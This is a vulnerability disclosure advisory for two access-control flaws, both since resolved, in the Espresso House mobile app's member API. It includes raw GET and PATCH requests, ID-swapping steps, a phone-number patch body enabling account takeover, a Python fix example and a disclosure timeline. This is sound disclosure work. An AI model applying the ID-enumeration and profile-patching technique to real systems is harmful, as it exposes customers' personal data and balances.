Espresso House Insufficient Access Control for Customer Profiles
Company Description
Espresso House is a Scandinavian coffee shop chain, founded in Sweden in 1996. It operates hundreds of locations across Sweden, Norway, Finland, Denmark, and Germany, offering a range of coffee, food, and bakery products. The company focuses on providing a casual café experience in urban and high-traffic areas.
Application Description
The Espresso House mobile app allows customers to order ahead, make payments, and collect loyalty points for rewards. It also offers personalised promotions, digital receipts, and the ability to locate nearby cafés. Individuals can self-enrol in the app for access to these features.
Espresso House Direct Object Reference for Customers
Summary
Adversaries could leverage an authorisation issue to gain access to customer profiles containing personal data.
Severity Scoring
HIGH, 7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Technical Details
- Have access to two membership accounts and log in as one of them.
- Monitor the HTTP requests issued by the application, especially the following:
GET /beproud/api/member/v1/[ ID FOR CURRENT USER ] HTTP/1.1
Host: myespressohouse.com
Content-Type: application/json-patch+json
Longitude: [ Longitude ]
Accept: */*
Latitude: [ Latitude ]
BPAuth: [ Access Token ]
User-Agent: Espresso House/3.0.9 (com.mps.eh; build:3141; iOS 12.1.2) Alamofire/4.8.0
Accept-Language: en
Accept-Encoding: gzip, deflate
Connection: close
Response:
{
"original": {
"myEspressoHouseNumber": "[ ID FOR CURRENT USER ]",
"firstName": "[ FIRST NAME ]",
"lastName": "[ LAST NAME ]",
[...]
- The request detailed above loads the user profile associated with the supplied membership ID; the back-end application does not validate whether or not the user is accessing their own profile, or a profile belonging to someone else.
- Swap the membership ID to that of the second account, while still being logged on as the first account; note how the application returns the second membership profile.
- As membership IDs are integer values, it is trivial to incrementally search for valid IDs and enumerate customer data through this vulnerability.
Recommendation
Either:
- Do not allow the user to supply the profile membership ID. Instead, derive this ID from the user session token. Or,
- Assert that the membership ID belongs to the current user before fetching and returning it to the requestor.
Espresso House Insufficient Authorisation for Profile Update
Summary
Adversaries could modify profile attributes in order to use the prepaid balances of other customers, gain a high level of VIP discount, upgrade an account to staff status, and more, by modifying the profile update request.
Severity Scoring
HIGH, 8.6 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
Technical Details
- Have access to two membership accounts and log in as one of them.
- Go to Profile > Settings > Name and update the first name.
- Monitor the HTTP requests issued by the application, especially the following:
PATCH /beproud/api/member/v1/[ ID FOR CURRENT USER ] HTTP/1.1
Host: myespressohouse.com
Content-Type: application/json-patch+json
Longitude: [ Longitude ]
Accept: */*
Connection: close
Latitude: [ Latitude ]
BPAuth: [ Access Token ]
Accept-Language: en
User-Agent: Espresso House/3.0.9 (com.mps.eh; build:3141; iOS 12.1.2) Alamofire/4.8.0
Accept-Encoding: gzip, deflate
Content-Length: 46
[{"op":"add","path":"firstName","value":"[ INPUT VALUE ]"}]
- The request detailed above modifies the user profile associated with the supplied membership ID.
- The value of the path attribute can be changed to point to other profile properties, such as mobile phone number. The following request body would update the user phone number to any value:
[{"op":"add","path":"phoneNumber","value":"[ INPUT VALUE ]"}]
The phone number is not normally modifiable via the application.
- The back-end application does not validate whether or not the user is accessing their own profile, or a profile belonging to someone else. This behaviour could allow an attacker to perform account takeovers and spend prepaid balances.
- As membership IDs are integer values, it is trivial to incrementally search for valid IDs to target.
Recommendation
Do not allow users to update arbitrary profile properties which cannot be modified through the user interface. Furthermore, assert that the profile to be updated belongs to the current user requesting the operation.
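The recommendations for both findings (an ownership check before the profile is read or updated, and an allowlist of properties the JSON Patch body may touch) as an added Python example; this is not Espresso House code or code from the advisory, and the in-memory store, the property names beyond those shown in the requests above, and the exception classes are assumptions.

```python
# Added example (not Espresso House code): a minimal authorisation layer for the
# member profile endpoints described above. The store, the property names not
# shown in the advisory, and the exception classes are assumptions.
import copy

# Constructed in-memory profile store keyed by myEspressoHouseNumber.
PROFILES = {
    1001: {"myEspressoHouseNumber": 1001, "firstName": "Anna", "lastName": "A",
           "phoneNumber": "+46700000001", "prepaidBalance": 150.0, "isStaff": False},
    1002: {"myEspressoHouseNumber": 1002, "firstName": "Bo", "lastName": "B",
           "phoneNumber": "+46700000002", "prepaidBalance": 20.0, "isStaff": False},
}

# Only properties the UI lets a customer edit may be patched, and only with these ops.
PATCHABLE = {"firstName": {"add", "replace"}, "lastName": {"add", "replace"}}


class Forbidden(Exception):
    """Raised when the caller is not the owner of the requested profile."""


class BadRequest(Exception):
    """Raised when a patch targets a property the UI does not expose."""


def require_owner(session_member_id, requested_member_id):
    # Recommendation 1: the ID in the URL must match the authenticated member
    # (taken from the validated session token, never from the request).
    if session_member_id != requested_member_id:
        raise Forbidden("profile does not belong to the current member")


def get_profile(session_member_id, requested_member_id):
    require_owner(session_member_id, requested_member_id)
    return copy.deepcopy(PROFILES[requested_member_id])


def patch_profile(session_member_id, requested_member_id, ops):
    require_owner(session_member_id, requested_member_id)
    # Recommendation 2: validate every operation before applying any of them,
    # so a mixed body cannot partially succeed. Accept "firstName" or "/firstName".
    for op in ops:
        path = str(op.get("path", "")).lstrip("/")
        if path not in PATCHABLE or op.get("op") not in PATCHABLE[path]:
            raise BadRequest("property %r is not patchable" % path)
        if not isinstance(op.get("value"), str):
            raise BadRequest("property %r expects a string" % path)
    profile = PROFILES[requested_member_id]
    for op in ops:
        profile[str(op["path"]).lstrip("/")] = op["value"]
    return copy.deepcopy(profile)
```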
Vulnerability Disclosure Timeline
2018-12-22 - Discovered and attempting to disclose via support
2018-12-27 - Support states they will forward the issue to the responsible department for review and follow-up if further contact is of interest
2018-12-31 - Requested a timeline for response
2019-01-02 - Support indicates they do not have a timeline for response, as the department will follow up if there’s interest
2019-01-09 - Informed company that the issue will be escalated if no one reaches out
2019-01-14 - Established contact with the company’s security function via CERT-SE
2019-01-16 - Status follow-up
2019-01-24 - Status follow-up
2019-02-11 - Issue confirmed as resolved